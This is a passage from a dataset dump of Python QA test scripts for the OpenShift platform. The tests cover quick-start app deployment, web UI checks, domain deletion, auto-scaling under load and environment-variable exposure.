suite.add_test(Demo02)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6417682766914368, "alphanum_fraction": 0.6417682766914368, "avg_line_length": 29.511627197265625, "blob_id": "10c5a6a9e6956fe2d264003a3750f5e6602485cd", "content_id": "ba8653a1f3ed9b835047dc000a8b23e90840f858", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1312, "license_type": "no_license", "max_line_length": 86, "num_lines": 43, "path": "/automation/open/testmodules/RT/quick_start/quick_start_dancer.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartDancer(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self,config)\n self.config.application_type = common.app_types[\"perl\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: dancer\"\n self.config.git_upstream_url = \"git://github.com/openshift/dancer-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Perl is dancing\"\n \n def pre_configuration_steps(self):\n self.log_info(\"Pre-onfiguring\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"rm -Rfv perl/\",\n \"git commit -a -m 'removing perl directory'\"\n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDancer)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5955701470375061, "alphanum_fraction": 0.62428218126297, "avg_line_length": 20.36842155456543, "blob_id": "28bea4caa1d0f1fc3c0d2c15fb74c4486dfa8eea", "content_id": "f045f58c2500df26b3776e0653511b3d4d56f7c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1219, "license_type": "no_license", "max_line_length": 138, "num_lines": 57, "path": "/automation/open/testmodules/UI/web/case_135718.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_135718.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Add_Invalid_Sshkey(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Change password\n web.go_to_account_page()\n web.input_by_id(\"key_raw_content\", \"ffffffff\")\n web.click_element_by_id(\"key_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''Type is required and cannot be blank.''', '''//div[@id='key_raw_content_input']/div/p''') \n\n self.tearDown()\n\n return self.passed(\"Case 135718 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Add_Invalid_Sshkey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_135718.py \n#\n# 
vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5938292741775513, "alphanum_fraction": 0.6001690626144409, "avg_line_length": 28.575000762939453, "blob_id": "30af5a4f0ea803d94aea21c7611d815d80f687ae", "content_id": "56dd9edfbe0feadafb99055fbccfb4f3839f6217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2366, "license_type": "no_license", "max_line_length": 145, "num_lines": 80, "path": "/automation/open/testmodules/RT/client/destroy_domain_with_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\"\"\"\ntestcase id 129353\n\n\"\"\"\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\nlib_dir = os.path.join(testdir, \"lib\")\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n # check if there's an existing domain, create one if does not\n cf = self.config\n self.steps_list = []\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n\n self.info(\"Checking for existing domain...\")\n status, res = cf.rest_api.domain_get()\n if status == 'OK':\n self.domain_name = res\n status, res = cf.rest_api.app_list()\n if len(res) > 0:\n # found an existing app, we are good to go.\n self.app_name = res[0]['name']\n else:\n self.info(\"Creating an app...\")\n self.info(\"xxX\", 1)\n else:\n self.info(\"No domain found, creating a new one...\")\n self.info(\"xxx\", 1)\n\n def finalize(self):\n pass\n\n\nclass DestroyDomainWithApp(OpenShiftTest):\n def test_method(self, args=None, case_id=None):\n step = testcase.TestCaseStep(\"Try to delete a domain with existing app(s)\",\n \"rhc domain delete %s -l %s -p '%s' %s\"% (self.domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[US1653][RT][CLI] Try to destroy a domain with applications\",\n self.steps_list \n )\n case.run()\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DestroyDomainWithApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6691842675209045, "alphanum_fraction": 0.6699395775794983, "avg_line_length": 31.292682647705078, "blob_id": "42d049e99fb20e38f94b9013712020e84b7acf9c", "content_id": "612e57c4f66da3e0c916c1cc96491e3a3c9ead3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1324, "license_type": "no_license", "max_line_length": 101, "num_lines": 41, "path": "/automation/open/testmodules/RT/quick_start/quick_start_sqlbuddy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport OSConf\nimport rhtest\nfrom 
quick_start_test import QuickStartTest\n\nclass QuickStartSqlbuddy(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"php\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: SQLBuddy\"\n self.config.git_upstream_url = \"git://github.com/openshift/sqlbuddy-openshift-quickstart.git\"\n\n \n def verification(self):\n self.log_info(\"Verifying\")\n app_url = OSConf.get_app_url(self.config.application_name)\n res = common.grep_web_page(app_url+'/sqlbuddy/login.php', 'Username')\n res += common.grep_web_page(app_url+'/sqlbuddy/login.php', 'Help!')\n self.assert_equal(res, 0, \"All the patterns must be found\")\n \n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartSqlbuddy)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5539624691009521, "alphanum_fraction": 0.5643720030784607, "avg_line_length": 38.77734375, "blob_id": "2ad82de4c69dcf3fe16e918c5938c988fa256d31", "content_id": "cc6229d411719ce491204e240ce480726637571d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10183, "license_type": "no_license", "max_line_length": 210, "num_lines": 256, "path": "/automation/open/testmodules/RT/scaling/auto_scaling_test.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nJun 27, 2012\n[US2307][RT][rhc-cartridge]Auto scaling test\n\"\"\"\nimport common, testcase, OSConf\nimport rhtest\nimport subprocess, commands\nimport re\nimport os\nimport time\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\ncode_dict = { \"jbosseap\" : r\"\"\"<%@ page session=\"false\" %>\n<%@ page contentType=\"text/html\" language=\"java\" %>\n<%@ page import=\"javax.naming.*\" %>\n<%@ page import=\"java.io.*\" %>\n<%@ page import=\"java.util.*\" %>\n<%@ page import=\"java.text.*\" %>\n<%\nMap map = System.getenv();\nout.print(\"App DNS \" + map.get(\"OPENSHIFT_GEAR_DNS\"));\n%>\n\"\"\",\n \"php\" : r\"\"\"<html>\n<body>\n<?php\n$OPENSHIFT_GEAR_DNS = getenv(\"OPENSHIFT_GEAR_DNS\");\n echo \"App DNS \".$OPENSHIFT_GEAR_DNS .\"<br />\";\n?>\n</body>\n</html>\"\"\",\n \"perl\" : r\"\"\"#!/usr/bin/perl\nprint \"Content-type: text/html\\r\\n\\r\\n\";\nprint \"App DNS \".$ENV{\"OPENSHIFT_GEAR_DNS\"};\"\"\",\n \"ruby\" : r\"\"\"require \"thread-dump\"\nmap \"/health\" do\n health = proc do |env|\n [200, { \"Content-Type\" => \"text/html\" }, [\"1\"]]\n end\n run health\nend\nmap \"/\" do\n welcome = proc do |env|\n [200, { \"Content-Type\" => \"text/plain\" }, [\"App DNS \" + ENV[\"OPENSHIFT_GEAR_DNS\"]]]\n end\n run welcome\nend\"\"\",\n \"python\" : r\"\"\"#!/usr/bin/python\nimport os\nvirtenv = os.environ[\"APPDIR\"] + \"/virtenv/\"\nos.environ[\"PYTHON_EGG_CACHE\"] = os.path.join(virtenv, \"lib/python2.6/site-packages\")\nvirtualenv = os.path.join(virtenv, \"bin/activate_this.py\")\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\ndef application(environ, start_response):\n ctype = \"text/plain\"\n if environ[\"PATH_INFO\"] == \"/health\":\n response_body = \"1\"\n else:\n response_body = \"App DNS \" + os.environ[\"OPENSHIFT_GEAR_DNS\"]\n\n status = \"200 OK\"\n response_headers = [(\"Content-Type\", ctype), (\"Content-Length\", 
str(len(response_body)))]\n start_response(status, response_headers)\n return [response_body]\"\"\",\n \"nodejs\" : r\"\"\"#!/bin/env node\nvar express = require(\"express\");\nvar app = express.createServer();\napp.get(\"/health\", function(req, res){\n res.send(\"1\");\n});\napp.get(\"/\", function(req, res){\n res.send(\"App DNS \" + process.env.OPENSHIFT_GEAR_DNS, {\"Content-Type\": \"text/plain\"});\n});\nvar ipaddr = process.env.OPENSHIFT_INTERNAL_IP;\nvar port = process.env.OPENSHIFT_INTERNAL_PORT || 8080;\nif (typeof ipaddr === \"undefined\") {\n console.warn(\"No OPENSHIFT_INTERNAL_IP environment variable\");\n}\nfunction terminator(sig) {\n if (typeof sig === \"string\") {\n console.log(\"%s: Received %s - terminating Node server ...\",\n Date(Date.now()), sig);\n process.exit(1);\n }\n console.log(\"%s: Node server stopped.\", Date(Date.now()) );\n}\nprocess.on(\"exit\", function() { terminator(); });\n[\"SIGHUP\", \"SIGINT\", \"SIGQUIT\", \"SIGILL\", \"SIGTRAP\", \"SIGABRT\", \"SIGBUS\",\n \"SIGFPE\", \"SIGUSR1\", \"SIGSEGV\", \"SIGUSR2\", \"SIGPIPE\", \"SIGTERM\"\n].forEach(function(element, index, array) {\n process.on(element, function() { terminator(element); });\n});\napp.listen(port, ipaddr, function() {\n console.log(\"%s: Node server started on %s:%d ...\", Date(Date.now() ),\n ipaddr, port);\n});\n\"\"\",\n }\ncode_dict[\"jbossas\"] = code_dict[\"jbosseap\"]\ncode_dict[\"ruby-1.9\"] = code_dict[\"ruby\"]\ncode_dict[\"python-2.7\"] = code_dict[\"python\"]\ncode_dict[\"python-3.3\"] = code_dict[\"python\"]\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'INT', 'STG']\n\n def initialize(self):\n #check the presence of /usr/bin/ab command\n if not os.path.exists(\"/usr/bin/ab\"):\n raise rhtest.TestIncompleteError(\"Missing /usr/bin/ab file: (No httpd-tools package?))\")\n self.steps_list = []\n self.summary = \"[US2307][RT][rhc-cartridge]Auto scaling test\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = \"jbosseap\"\n self.domain_name = common.get_domain_name()\n self.app_name = self.test_variant.split('-')[0] + \"auto\"\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = self.app_name\n self.proc = None\n common.env_setup()\n\n def finalize(self):\n if self.proc.poll() == None:\n self.proc.kill()\n\n\nclass AutoScalingTest(OpenShiftTest):\n\n def trigger_autoscale(self):\n url = OSConf.get_app_url(self.app_name)\n if self.config.options.run_mode == 'DEV':\n #self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 200\", \"-n 100000\", \"http://\" + url + \"/\"])\n self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 50\", \"-t 60\", \"http://\" + url + \"/\"])\n else:\n #self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 70\", \"-n 100000\", \"http://\" + url + \"/\"])\n self.proc = subprocess.Popen([\"/usr/bin/ab\", \"-c 50\", \"-n 60\", \"http://\" + url + \"/\"])\n\n def remove_dup(self, lst):\n if lst == []:\n return []\n lst.sort()\n result = []\n result.append(lst[0])\n for i in range(len(lst) - 1):\n if lst[i] != lst[i+1]:\n result.append(lst[i+1])\n return result\n \n def confirm_autoscale(self):\n url = OSConf.get_app_url(self.app_name)\n # check if all gears are available\n gear_lst = []\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n for i in range(20):\n (ret, output) = common.command_getstatusoutput(cmd, quiet=True)\n if ret != 0:\n time.sleep(3)\n else:\n pattern = re.compile(r'(?<=App DNS ).+com', re.M)\n match = pattern.search(output)\n if match == None:\n time.sleep(3)\n elif 
match.group(0) not in gear_lst:\n gear_lst.append(match.group(0))\n self.debug(\"Gears found: \" + ' '.join(gear_lst))\n if len(gear_lst) >= 2:\n return 0\n else:\n return 2\n\n def test_method(self):\n global code_dict\n # 1. Create app\n self.steps_list.append(testcase.TestCaseStep(\"Create an %s app: %s\" % (self.test_variant, self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", True, \"small\", -1, False],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. Write some code to show the gear DNS\n file_path = { \"jbosseap\" : \"%s/src/main/webapp/index.jsp\" % (self.git_repo),\n \"jbossas\" : \"%s/src/main/webapp/index.jsp\" % (self.git_repo),\n \"php\" : \"%s/php/index.php\" % (self.git_repo),\n \"perl\" : \"%s/perl/index.pl\" % (self.git_repo),\n \"python\" : \"%s/wsgi/application\" % (self.git_repo),\n \"python-2.7\" : \"%s/wsgi/application\" % (self.git_repo),\n \"python-3.3\" : \"%s/wsgi/application\" % (self.git_repo),\n \"ruby\" : \"%s/config.ru\" % (self.git_repo),\n \"nodejs\" : \"%s/server.js\" % (self.git_repo),\n }\n cmd = \"rm -f %s/src/main/webapp/index.html ; echo '%s' > '%s'\" % (self.git_repo, code_dict[self.test_variant], file_path[self.test_variant])\n if self.test_variant in (\"jbossas\", \"jbosseap\"):\n cmd += \"\"\"; sed -i '/<system-properties>/ a\\\\\\n<property name=\"org.apache.catalina.session.StandardManager.MAX_ACTIVE_SESSIONS\" value=\"-1\"/>' %s/.openshift/config/standalone.xml\"\"\" % (self.git_repo)\n self.steps_list.append(testcase.TestCaseStep(\"Write some code to show the gear DNS\",\n cmd,\n expect_description=\"the code should be written successfully\",\n expect_return=0))\n # 3. Git push all the changes\n self.steps_list.append(testcase.TestCaseStep(\"Git push all the changes\",\n \"cd %s && git add . && git commit -amt && git push\" % (self.git_repo),\n expect_description=\"the changes should be git pushed successfully\",\n expect_return=0))\n # 4. Confirm the app is available\n self.steps_list.append(testcase.TestCaseStep(\"Confirm the app is available\",\n common.grep_web_page,\n function_parameters=[OSConf.get_app_url_X(self.app_name), r\"%s.*.com\" % (self.domain_name), \"-H 'Pragma: no-cache' -L\", 5, 4],\n #function_parameters=[OSConf.get_app_url_X(self.app_name), r\"\\w+-%s.*\\.com\" % (self.domain_name), \"-H 'Pragma: no-cache' -L\", 5, 4],\n expect_description=\"the app should be available\",\n expect_return=0))\n # 5. Establish multiple parallel connections to the app to trigger auto-scaling\n self.steps_list.append(testcase.TestCaseStep(\"Establish multiple parallel connections to the app to trigger auto-scaling\",\n self.trigger_autoscale,\n expect_description=\"auto-scaling should be triggered\",\n ))\n # 6. 
Confirm auto-scaling is triggered\n self.steps_list.append(testcase.TestCaseStep(\"Confirm auto-scaling is triggered\",\n self.confirm_autoscale,\n expect_description=\"auto-scaling should be triggered\",\n try_count=60,\n try_interval=10,\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AutoScalingTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.606776773929596, "alphanum_fraction": 0.6134206652641296, "avg_line_length": 49.406700134277344, "blob_id": "8bfdddff83bdd323cb7fbc7d5a8a50f5caff140d", "content_id": "eab4e21e0efa4321ceff15720b8574cb21bac892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10536, "license_type": "no_license", "max_line_length": 478, "num_lines": 209, "path": "/automation/open/testmodules/RT/cartridge/env_vars.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n\n[US650][Runtime][rhc-cartridge]Environment Variables\nhttps://tcms.engineering.redhat.com/case/138802/\n\"\"\"\n\nimport os,sys,re\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US650][Runtime][rhc-cartridge]Environment Variables\"\n\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n\n self.app_name = common.getRandomString(10)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EnvVars(OpenShiftTest):\n def test_method(self):\n # env vars should be found without mysql embedded\n env_lst = 'OPENSHIFT_LOG_DIR OPENSHIFT_APP_NAME OPENSHIFT_APP_UUID OPENSHIFT_TMP_DIR OPENSHIFT_HOMEDIR OPENSHIFT_REPO_DIR OPENSHIFT_GEAR_NAME OPENSHIFT_INTERNAL_PORT OPENSHIFT_RUN_DIR OPENSHIFT_INTERNAL_IP OPENSHIFT_GEAR_DIR OPENSHIFT_GEAR_TYPE OPENSHIFT_GEAR_DNS OPENSHIFT_DATA_DIR OPENSHIFT_GEAR_UUID'.split()\n # env vars should be found with mysql embedded\n env_mysql_lst = 'OPENSHIFT_DB_HOST OPENSHIFT_LOG_DIR OPENSHIFT_APP_NAME OPENSHIFT_APP_UUID OPENSHIFT_TMP_DIR OPENSHIFT_HOMEDIR OPENSHIFT_REPO_DIR OPENSHIFT_GEAR_NAME OPENSHIFT_INTERNAL_PORT OPENSHIFT_DB_PASSWORD OPENSHIFT_DB_USERNAME OPENSHIFT_RUN_DIR OPENSHIFT_INTERNAL_IP OPENSHIFT_GEAR_DIR OPENSHIFT_GEAR_TYPE OPENSHIFT_GEAR_DNS OPENSHIFT_DB_URL OPENSHIFT_DATA_DIR OPENSHIFT_GEAR_UUID OPENSHIFT_DB_TYPE OPENSHIFT_DB_PORT'.split()\n env_mongodb_lst = 'OPENSHIFT_NOSQL_DB_USERNAME OPENSHIFT_NOSQL_DB_TYPE OPENSHIFT_LOG_DIR OPENSHIFT_APP_NAME OPENSHIFT_APP_UUID OPENSHIFT_NOSQL_DB_URL OPENSHIFT_TMP_DIR OPENSHIFT_HOMEDIR OPENSHIFT_REPO_DIR OPENSHIFT_GEAR_NAME OPENSHIFT_INTERNAL_PORT OPENSHIFT_NOSQL_DB_PASSWORD OPENSHIFT_RUN_DIR OPENSHIFT_NOSQL_DB_PORT OPENSHIFT_INTERNAL_IP OPENSHIFT_GEAR_DIR 
OPENSHIFT_NOSQL_DB_HOST OPENSHIFT_GEAR_TYPE OPENSHIFT_GEAR_DNS OPENSHIFT_DATA_DIR OPENSHIFT_GEAR_UUID'.split()\n\n # 1. Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. Append cmd 'env' into file '<repo_path>/.openshift/action_hooks/build'\n self.steps_list.append( testcase.TestCaseStep(\"2.Append cmd 'env' into file '<repo_path>/.openshift/action_hooks/build'\",\n \"echo '\\nenv' >> %s/.openshift/action_hooks/build\" % (self.git_repo),\n expect_description=\"Successfully added 1 line to .openshift/action_hooks/build\",\n expect_return=0))\n\n # 3.copy template to git repo and git push\n if self.test_variant == \"wsgi\":\n cmd = \"cd %s/wsgi && rm -f application && cp -f %s/app_template/env_var/python/application application && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"php\":\n cmd = \"cd %s/php && rm -f index.php && cp -f %s/app_template/env_var/php/index.php index.php && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"perl\":\n cmd = \"cd %s/perl && rm -f index.pl && cp %s/app_template/env_var/perl/index.pl index.pl && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"rack\":\n cmd = \"cd %s && rm -f config.ru && cp %s/app_template/env_var/ruby/config.ru config.ru && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"nodejs\":\n cmd = \"cd %s && rm -f server.js && cp %s/app_template/env_var/nodejs/server.js server.js && git add . && git commit -am t && git push\" % (self.git_repo, WORK_DIR)\n elif self.test_variant == \"jbossas\" or self.test_variant == \"diy\":\n cmd = \"cd %s && touch testfile && git add . 
&& git commit -am t && git push\" % (self.git_repo)\n\n self.steps_list.append(testcase.TestCaseStep(\n \"3.copy template to git repo and git push\",\n cmd,\n output_callback = self.store_output,\n expect_description=\"Successfully copy template to git repo and git push\",\n expect_return=0))\n\n # 4.Check env vars from the output of git push\n self.steps_list.append(testcase.TestCaseStep(\n \"4.Check env vars from the output of git push\",\n self.compare,\n function_parameters=[self.get_last_output, env_lst],\n expect_description=\"The openshift env vars should be found in the output of git push\",\n expect_return=True))\n\n if self.test_variant == \"jbossas\" or self.test_variant == \"diy\":\n self.info(\"%s app doesn't need to check the web page\" % (self.test_variant))\n else:\n # 5.Fetch the home page of the app\n\n # 6.Check env vars from the web page\n self.steps_list.append( testcase.TestCaseStep(\"6.Check env vars from the web page\",\n self.compare,\n function_parameters=[self.get_page, env_lst],\n expect_description=\"The openshift env vars should be found in the web page\",\n expect_return=True))\n\n i = 7\n for (cart,lst) in ((\"mysql-5.1\",env_mysql_lst), (\"mongodb-2.2\",env_mongodb_lst)):\n # 7.Embed database to this app\n self.steps_list.append( testcase.TestCaseStep(\"%d.Embed %s to this app\" % (i,cart),\n common.embed,\n function_parameters=[self.app_name, \"add-\" + cart, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"%s should be embedded successfully\" % (cart),\n expect_return=0))\n\n # 8.Make some change and git push again\n self.steps_list.append( testcase.TestCaseStep(\"%d.Make some change and git push again\" % (i),\n \"cd %s && echo '\\n' >> .openshift/action_hooks/build && git add . 
&& git commit -am t && git push\" % (self.git_repo),\n output_callback=self.store_output,\n expect_description=\"Git push should succeed\",\n expect_return=0))\n\n # 9.Check env vars from the output of git push after embedding database\n self.steps_list.append( testcase.TestCaseStep(\"%d.Check env vars from the output of git push after embedding %s\" % (i,cart),\n self.compare,\n function_parameters=[self.get_last_output, lst],\n expect_description=\"The openshift env vars should be found in the output of git push\",\n expect_return=True))\n\n # 10.Fetch the home page of the app\n if self.test_variant == \"jbossas\" or self.test_variant == \"diy\":\n self.info(\"%s app doesn't need to check the web page\" % (self.test_variant))\n else:\n self.steps_list.append( testcase.TestCaseStep(\"%d.Fetch the home page of the app\" % (i),\n \"curl -s -H 'Pragma: no-cache' '%s'\",\n string_parameters = [OSConf.get_app_url_X(self.app_name)],\n expect_description=\"Successfully get the web page\",\n expect_return=0))\n # 11.Check env vars from the web page\n self.steps_list.append( testcase.TestCaseStep(\"%d.Check env vars from the web page\" % (i),\n self.compare,\n function_parameters=[self.get_last_output, lst],\n expect_description=\"The openshift env vars should be found in the web page\",\n expect_return=True))\n # 12.Remove embedded database\n self.steps_list.append( testcase.TestCaseStep(\"%d.Remove embedded database\" % (i),\n common.embed,\n function_parameters=[self.app_name, \"remove-\" + cart, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"%s should be removed successfully\" % (cart),\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def contains(self, lst1, lst2):\n '''Check if ordered list lst1 contains ordered list lst2'''\n if len(lst1) < len(lst2):\n return False\n i = 0\n for j in range(0, len(lst2)):\n if i >= len(lst1):\n return False\n while i < len(lst1) and lst2[j] != lst1[i]:\n i += 1\n i += 1\n return True\n\n def compare(self, output, env_lst):\n pattern = re.compile(r'OPENSHIFT[\\w_]+(?=[=\\s])', re.S)\n match_lst = pattern.findall(output)\n match_lst.sort()\n env_lst.sort()\n print \"Environment variables found in the output/webpage:\"\n print match_lst\n print \"Environment variables should be found:\"\n print env_lst\n return self.contains(match_lst, env_lst)\n\n def get_last_output(self):\n return self.output\n\n def store_output(self, output):\n #self.info(\"Saving output...\\n%s\"%output)\n self.output=output\n return {}\n\n def get_page(self):\n #self.info(\"get_page()\")\n cmd=\"curl -s -H 'Pragma: no-cache' '%s'\"%OSConf.get_app_url(self.app_name)\n (status, output) = common.command_getstatusoutput(cmd)\n return output\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EnvVars)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6337325572967529, "alphanum_fraction": 0.6628172397613525, "avg_line_length": 71.29896545410156, "blob_id": "ccdcb59d60519f25ce75aeaaeb5685ace5e9d18e", "content_id": 
"634269b118d939631ad1e18b6935580649547b50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7014, "license_type": "no_license", "max_line_length": 674, "num_lines": 97, "path": "/automation/open/testmodules/UI/web/case_163038.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_163038.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_jenkins_page(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Check cartridge page\n web.go_to_developer()\n time.sleep(5)\n web.click_element_by_link_text(\"Build with Jenkins\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Build with Jenkins''', '''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.assert_text_equal_by_xpath('''Jenkins (https://wiki.jenkins-ci.org) is a full featured continuous integration (CI) server that can run builds, tests, and other scheduled tasks and integrate with your OpenShift applications.''', '''//div[@id='node-10295']/div/p''') \n web.click_element_by_link_text(\"https://wiki.jenkins-ci.org\") \n time.sleep(2)\n web.check_title(\"Home - Jenkins - Jenkins Wiki\")\n web.go_back()\n web.assert_text_equal_by_xpath('''With Jenkins, you have access to a full library of plugins (https://wiki.jenkins-ci.org/display/JENKINS/Plugins) and a vibrant, thriving community of users who have discovered a new way to do development. The basic work flow is:''', '''//div[@id='node-10295']/div/p[2]''')\n web.click_element_by_link_text(\"https://wiki.jenkins-ci.org/display/JENKINS/Plugins\")\n web.check_title(\"Plugins - Jenkins - Jenkins Wiki\")\n web.go_back() \n web.assert_text_equal_by_xpath('''Commit and push new code to your repo.''', 